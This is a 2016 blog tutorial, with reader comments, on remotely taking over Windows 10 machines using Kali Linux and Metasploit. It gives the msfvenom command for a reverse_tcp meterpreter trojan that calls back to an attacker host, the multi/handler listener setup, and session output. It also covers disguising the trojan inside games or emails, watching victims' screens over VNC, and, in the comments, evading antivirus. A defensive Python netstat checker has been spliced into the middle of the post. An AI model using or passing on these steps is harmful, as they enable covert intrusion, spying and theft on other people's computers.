How to hack windows 10 using kali linux remotely with metasploit – 2016

Microsoft claims that Windows 10 has fixed all security vulnerabilities. We can't hack a Windows PC with a remote exploit like "ms08_067_netapi" anymore; Windows has fixed that vulnerability. So sad. Wait a minute, then how can we hack a Windows PC, is that even possible now? The answer is yes: Windows machines are still vulnerable to Trojan attacks regardless of version. With this method you can hack any Windows machine: 10, 8.1, 8, 7, Vista and XP.

A trojan or a backdoor can give remote access to the target machine. We all know that, so I'm not going too deep into explaining what a trojan is. Here we are going to use a reverse_tcp trojan. This is specially crafted malware that establishes a connection from the victim machine back to the hacker's machine over the Transmission Control Protocol (TCP). Because the victim connects outward, the hacker does not need an open port on the victim; this lets the hacker get into the machine and take full control over it.

The Metasploit framework is one of the tools I love most in Kali Linux. It has both a handler and a payload generator. Once the payload gets executed on the target machine while we are listening in the handler, it spawns a meterpreter shell. This meterpreter shell allows us to communicate with the target system and execute shell commands. Compared to a normal shell, meterpreter has plenty more options. This works whether the target is on the same LAN or over the internet; there is no difference, you just have to configure the router and the payload accordingly. The process is dead simple. Follow the steps.


Demo Video

Router Configuration

This step is very important when your target is over the internet (WAN). Skip this step if your target is on the same LAN. Hacking a PC over the internet means you have to communicate in both directions, so your router/modem has to open a port through to your machine. This is called port forwarding. By default all inbound ports are closed by your router/modem. Open a browser and go to http://192.168.1.1. Type in your username and password (by default both username and password are "admin"). This takes you to the router settings. Go to Advanced settings and find port forwarding. Click "add new" and set the start and end port to 444 (since we are using port 444 in Metasploit). In the IP address field type your Linux machine's internal IP. Save the settings and you are done. You can double check by scanning your port with an online port scanner.

Generate the Trojan

Generate the payload using msfvenom. Set the port to 444 and the IP to your public IP or your local IP, depending on where your target is. The generated trojan will try to connect to this IP and port when it is executed. The following command generates the trojan in .exe format.
# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST="attacker ip" LPORT=444 -o /root/Desktop/trojan.exe
  
trojan.exe will be generated on the Desktop. Keep it aside and move on to the handler section. Fire up Metasploit and follow the steps.
# msfconsole

Wait a minute for msfconsole to come up. Then use the handler and set the payload, port and host.

1. Handler

msf> use multi/handler

2. Set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST "attacker ip"

5. Exploit

msf exploit(handler) > exploit

Wait for the target to connect back.

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler…

Execute the payload

Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea; better to encode it and attach it to a normal application or a game, or even send it by email. Once our trojan is in and gets executed, a meterpreter session will be spawned.
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler…
[*] Sending stage (83170 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.104:444 -> 192.168.1.105:36028) at 2016-05-20 03:20:45 -0500
meterpreter >
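
As an added example from the defender's side (not code from the original post), here is a Python check that scans Windows `netstat -ano` output together with a PID-to-executable map and flags connections that look like the callback in the session output above: an executable running from a user-writable folder such as %TEMP% or the Desktop holding an established connection to an uncommon port like 444. All sample rows, addresses and paths below are constructed for the example.

```python
import re

# Ports a workstation application normally talks to; a callback to 444 is not one of them.
COMMON_PORTS = {25, 53, 80, 443, 587, 993, 995}
# Folders a dropped trojan.exe is typically run from (matched against lower-cased paths).
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\desktop\\")
# One "netstat -ano" row: proto, local addr:port, remote addr:port, state, owning PID.
NETSTAT_RE = re.compile(
    r"^\s*TCP\s+(?P<lip>[\d.]+):(?P<lport>\d+)\s+(?P<rip>[\d.]+):(?P<rport>\d+)"
    r"\s+(?P<state>\S+)\s+(?P<pid>\d+)\s*$"
)


def find_reverse_shell_candidates(netstat_lines: list[str], images: dict[int, str]) -> list[dict]:
    """Return established TCP connections that look like a reverse_tcp callback."""
    hits = []
    for line in netstat_lines:
        m = NETSTAT_RE.match(line)
        if not m or m["state"] != "ESTABLISHED":
            continue  # skip listeners, header lines and anything that is not TCP
        pid, rport = int(m["pid"]), int(m["rport"])
        image = images.get(pid, "<unknown>").lower()
        reasons = []
        if any(folder in image for folder in USER_WRITABLE):
            reasons.append("executable runs from a user-writable folder")
        if rport not in COMMON_PORTS:
            reasons.append(f"uncommon remote port {rport}")
        if reasons:
            hits.append({"pid": pid, "image": image,
                         "remote": f"{m['rip']}:{rport}", "reasons": reasons})
    return hits


# Constructed sample: a browser, the trojan from this post calling home to port 444,
# a mail client, and an RPC listener that must not be flagged.
SAMPLE_NETSTAT = """
  TCP    192.168.1.105:49712    203.0.113.10:443       ESTABLISHED     2140
  TCP    192.168.1.105:36028    192.168.1.104:444      ESTABLISHED     3310
  TCP    192.168.1.105:49801    203.0.113.20:993       ESTABLISHED     1880
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
""".strip().splitlines()
SAMPLE_IMAGES = {  # constructed PID -> executable map (what "tasklist" would give you)
    2140: r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    3310: r"C:\Users\alice\AppData\Local\Temp\trojan.exe",
    1880: r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
}

if __name__ == "__main__":
    for hit in find_reverse_shell_candidates(SAMPLE_NETSTAT, SAMPLE_IMAGES):
        print(f"PID {hit['pid']} {hit['image']} -> {hit['remote']}: {'; '.join(hit['reasons'])}")
```

On a real host the same two inputs come from `netstat -ano` and `tasklist`, and the flagged PID is the one to kill and whose image to delete, which is exactly the cleanup the author describes in the comments.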
A meterpreter session allows you to execute system commands, run networking commands, spy on the screen and much more.

Use the help command to see the whole list of commands.

meterpreter > help

Use this command to start a VNC session and watch the target's screen.

meterpreter > run vnc
This whole process is simple, but the toughest part is getting the trojan onto the target user's machine. Attaching the file to games works great.
Read my blog on privilege escalation in Windows to learn how to get admin privileges on a hacked system.
Any doubts or questions? Post them in the comment section below. If you like this blog, give me a like on Facebook and add me on Google Plus. Subscribe to my YouTube channel for video tutorials.
susmith HCK

I'm a computer enthusiast basically and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and I would like to explore security vulnerabilities and the latest tech news and share them with you. If you like all this stuff, add me on Facebook and Google Plus.

24 thoughts on "How to hack windows 10 using kali linux remotely with metasploit – 2016"

    • May 22, 2016 at 8:32 pm

      You have to manually transfer the trojan, e.g. by email or fake download links.
    • June 9, 2016 at 10:32 am

      You sly rascal.... the site rocks.
  • June 10, 2016 at 1:14 pm

    I refuse to accept that Windows 10 will remain untouchable for long. Remote exploits exist in many places, even as security awareness increases. There is always an oversight somewhere. It just takes the right person to find it.
    • June 24, 2016 at 10:38 am

      Yeah. I'm trying to find a remote exploit..
    • June 28, 2016 at 2:09 pm

      Use veil-evasion or some better encoders. I use multiple encoders at random and it bypassed 30+ major antivirus / malware detectors.
  • August 18, 2016 at 12:08 am

    I ran the payload and exploit but no session was created? Do you need to turn off the Windows firewall etc.?
    • susmith HCK
      August 18, 2016 at 6:53 pm

      If the firewall has blocked the payload then you have to turn it off. It will give you a popup message if blocked. If nothing happens then there is some problem with the payload or the Metasploit listener. Provide the correct IP address and make sure both target and hacker machine can ping each other.
  • September 2, 2016 at 5:24 pm

    First of all you just have to stop Windows Defender or the antivirus installed on your device.
  • September 3, 2016 at 3:19 am

    If using VirtualBox, in order for WAN to work, do I have to find my IP on the original machine? Because when I use "ifconfig" I get the 192.168.1.4 address.
    • susmith HCK
      September 3, 2016 at 10:34 am

      Google "my ip", you can find it there. Set that IP in the payload and in the router forward the port to "192.168.1.4" (Kali machine).
  • September 3, 2016 at 3:25 am

    How do I remove the virus afterwards?
    • susmith HCK
      September 3, 2016 at 10:36 am

      Actually this is not a persistent one, so it won't cause any serious damage after the end of the session. To remove it completely, delete the exe and clear the "temp" folder (START + R >> %temp% >> hit enter >> select all, delete).
  • September 25, 2016 at 10:48 pm

    # msfvenom -p windows/meterpreter/reverse_tcp –platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe

    There is another "-" missing in front of -platform...
    (only on the site, not in the video) 🙂
      • susmith HCK
        September 26, 2016 at 1:22 pm

        It's a bug in WordPress: "--" is treated as a single "-". Sorry for that.
    • November 5, 2016 at 12:10 am

      How to port forward on a netis2419? Can anyone guide me step by step? Whenever I try to put in my VM IP address it says invalid IP. What should I do now????
  • October 1, 2016 at 5:17 am

    Windows 10 removes it immediately 🙂
    • October 13, 2016 at 9:12 pm

      Yes Sir! Same here.
  • October 28, 2016 at 3:52 am

    Need to find vulnerabilities [few in a fully patched Win10] and a remote exploit; with the rising security awareness it will be highly unlikely to get a user-dependent trojan executed...
    At it, but so far no luck still... keep trying till you crack, or be cracked!!!!
  • November 5, 2016 at 10:02 am

    Hi.
    That was a great video. Thank you for sharing. After starting the VNC I am seeing the desktop but can't access it through Kali. Can you please help with this?
  • January 8, 2017 at 11:11 pm

    Windows 10 has more open vulnerabilities than you can imagine. It's like Microsoft locked one door and opened 10 others. Honestly we should be thankful to them, as we can make more progress breaking & understanding how the brains at MS think. 😉
